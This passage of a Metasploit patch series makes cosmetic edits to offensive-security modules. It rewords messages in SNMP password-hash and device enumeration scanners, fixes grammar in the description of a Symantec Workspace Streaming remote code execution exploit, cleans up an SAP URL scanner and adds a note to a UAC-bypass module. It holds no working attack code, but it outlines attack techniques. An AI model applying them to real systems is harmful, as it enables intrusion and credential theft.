b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index b06f16ec29..92bca9cb55 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary row.each { |val| @hashes << val.value.to_s } end - print_good("#{ip} Found Users & Password Hashes:") + print_good("#{ip} - Found user and password hashes:") end credinfo = "" @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 44f87f1508..07a4840766 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 68a59454ac..ab88d07bfb 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index 9e77e808f0..c7fe29df13 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -19,11 +19,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in Symantec Workspace Streaming. The vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the - as_agent.exe service, which allows to upload arbitrary files under the server root. - This module abuses the auto deploy feature at the JBoss as_ste.exe's instance in order + as_agent.exe service, which allows for uploading arbitrary files under the server root. + This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order to achieve remote code execution. This module has been tested successfully on Symantec Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single - machine deployment, and also at the backend role in a multiple machines deployment + machine deployment, and also in the backend role in a multiple machine deployment. }, 'Author' => [ From dc0e649a10b7a5a706cbdb88992bd7d6c2d09fcf Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 19 May 2014 09:21:07 -0500 Subject: [PATCH 32/33] Clean up case statement --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 7c26bbd1dc..c8ece7ac37 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary when 404 # Do not return by default, only display in verbose mode vprint_status("#{full_url} - not found (#{res.code})") - when 400,500 + when 400, 500 print_status("#{full_url} - produced a server error (#{res.code})") - when 301, 302, + when 301, 302 print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") @valid_urls << full_url << "\n" when 307 From b84379ab3b8d88895270c9c7928c550aad4cdb5e Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 19 May 2014 22:00:09 +0100 Subject: [PATCH 33/33] Note about EXE::Custom --- modules/exploits/windows/local/bypassuac_injection.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index e297bbe31e..3ec7214054 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). + If specifying EXE::Custom your DLL should call ExitProcess() after starting + your payload in a seperate process. }, 'License' => MSF_LICENSE, 'Author' => [